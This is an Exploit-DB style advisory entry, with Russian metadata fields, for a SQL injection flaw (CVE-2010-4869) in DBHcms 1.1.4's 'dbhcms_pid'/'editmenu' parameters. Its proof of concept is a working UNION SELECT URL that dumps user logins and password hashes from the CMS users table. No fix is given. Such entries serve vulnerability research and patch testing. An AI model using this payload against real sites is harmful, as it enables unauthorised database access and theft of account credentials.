Exploit DBHcms 1.1.4 - 'dbhcms_pid' SQL Injection

[Exploiter]

EDB-ID

15309

Проверка EDB

1. Пройдено

Автор

ZONTA

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2010-4869

Дата публикации

2010-10-24

DBHcms 1.1.4 SQL Injection Vulnerability

# Exploit Title:    DBHcms 1.1.4 SQL Injection Vulnerability
# Date: 24-10-2010 
# Author: ZonTa
# Mail: zontahackers[at]gmail[dot]com 
# IM : zontahackers[at]live[dot]com

# Software Link:    http://www.drbenhur.com/downloads-dbhcms-114-1-69-en.html
# Version: 1.1.4
# Tested on: Apache,PHP5


ABOUT
--------------

The DBHcms is a Open Source content management system for personal
and small business websites. It is search engine optimized, also
for multiple languages simultaneously by allowing the search engine
bot to index every single page.


POC
--------------

http://192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--


FIX
--------------

Not yet released.


Greetz to Sri Lankanz ~